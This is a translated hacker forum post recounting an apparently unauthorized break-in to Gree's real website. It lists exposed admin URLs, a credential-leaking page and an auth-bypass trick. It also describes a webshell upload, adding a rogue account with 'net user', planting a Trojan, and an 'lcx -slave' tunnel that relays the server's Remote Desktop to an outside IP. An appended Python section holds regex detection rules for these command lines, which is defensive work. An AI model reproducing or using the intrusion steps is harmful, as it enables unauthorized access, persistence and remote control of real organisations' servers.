Gree official website http://www.gree.com
Today, I happened to see someone in the group saying that Gree's official website was accessible...
Having nothing else to do, I went to take a look at Gree's website. The result was naturally ideal. ☺
I scanned directly for sensitive backend directories using the artifact.
This directly exposed the backend addresses:
http://www.gree.com/admin/config/main.jsp
http://www.gree.com/admin/config
Two backend addresses
A sensitive directory also displays the backend account and password information:
http://www.gree.com/admin/db.jsp
Log on to http://www.gree.com/admin/config/main.jsp with the obtained account and password.
Opening http://www.gree.com/admin/main.jsp then requires an account and password login, but I did not get a valid account and password. Then UP, by the way, reminded me of the browser intrusion method.
First log in to http://www.gree.com/admin/config/main.jsp with the account and password, then open http://www.gree.com/admin/main.jsp to reach the backend login interface. Because the backend does not allow right-click, decisively use the shortcut Ctrl + F5 to refresh the backend, and you will be pleasantly surprised to find that you have entered the backend.
Later I found the upload function and decisively uploaded a shell.
By: Aepl │ love
+ Shards +
By: bingfeng assassin
I took the webshell from my lover and sent a kitchen knife to my pony ^_^
With the system permission, an account net user -- icesword is added directly.
After adding the account, I found that the server is on the intranet, which is a lot of trouble.
However, I looked at the processes with tasklist and found that there was no antivirus software, so I simply planted a Trojan.
D:\~~~\> start C:\wmpub\ice.exe
In other words, I am still afraid of port forwarding. My 2 M bandwidth is too painful. In fact, I planted a Trojan to facilitate port forwarding.
Next, let's look at the remote Port:
D:\~~~\> REG query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
Port number --> 0x19c8 = 6060 (0x1908 is the hexadecimal number of 6060)
Now start port forwarding:
Local cmd:
#> C:\lcx.exe -listen 2222 3333
/* Comment: 2222 -- forwarding port; 3333 -- connection port */
Zombie server cmd:
#> C:\wmpub\lcx.exe -slave 110.88.55.78 2222 127.0.0.1 6060
/* Note: 110.88.55.78 is the local IP address; 6060 is the Remote Desktop port of the server */
Press Enter on the cmd command lines on both sides, and mstsc connects to 127.0.0.1:3333. (We can see that the windows on both sides are continuously sending and receiving packets.)
From: http://hi.baidu.com/421717582
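The command lines in this write-up (local account creation, the RDP-Tcp PortNumber registry query, and the -listen / -slave relay arguments) all appear in process-creation logs when command-line auditing is enabled. The following Python detection example is added here and is not part of the original post; the log records, host names, account names and addresses are constructed, and the rule names are hypothetical.

```python
import re
from collections import defaultdict

# Rules key on argument shape, so a renamed binary still matches.
RULES = {
    "local_account_added": re.compile(
        r"\bnet1?(?:\.exe)?\s+user\s+\S+.*\s/add\b", re.I),
    "rdp_port_lookup": re.compile(
        r"\breg(?:\.exe)?\s+query\s+.*Terminal Server\\WinStations\\RDP-Tcp.*PortNumber", re.I),
    "tcp_relay_args": re.compile(
        r"\s-(?:listen\s+\d{1,5}\s+\d{1,5}"
        r"|slave\s+(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5}\s+(?:\d{1,3}\.){3}\d{1,3}\s+\d{1,5})\b", re.I),
}

# Constructed sample records: (host, account, command line). Host names, account
# names and addresses (TEST-NET 203.0.113.0/24) are invented for this example.
SAMPLE_EVENTS = [
    ("WEB01", "SYSTEM", r"net user"),
    ("WEB01", "SYSTEM", r"net user tmpadmin Example-Pw1 /add"),
    ("WEB01", "SYSTEM", r'REG query "HKLM\SYSTEM\CurrentControlSet\Control'
                        r'\Terminal Server\WinStations\RDP-Tcp" /v PortNumber'),
    ("WEB01", "SYSTEM", r"C:\wmpub\svc.exe -slave 203.0.113.10 2222 127.0.0.1 6060"),
    ("FILE02", "admin", r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /v ProgramFilesDir"),
    ("FILE02", "admin", r"net user helpdesk /domain"),
]


def match_rules(command_line):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(command_line))


def hosts_to_triage(events, min_distinct=2):
    """Group hits by host; report hosts where several distinct rules fired."""
    hits = defaultdict(set)
    for host, _account, command_line in events:
        hits[host].update(match_rules(command_line))
    return {h: sorted(r) for h, r in hits.items() if len(r) >= min_distinct}


if __name__ == "__main__":
    for host, rules in hosts_to_triage(SAMPLE_EVENTS).items():
        print(host, rules)
```

Requiring several distinct rules on one host keeps routine administration, such as a lone registry query or account listing, out of the triage queue.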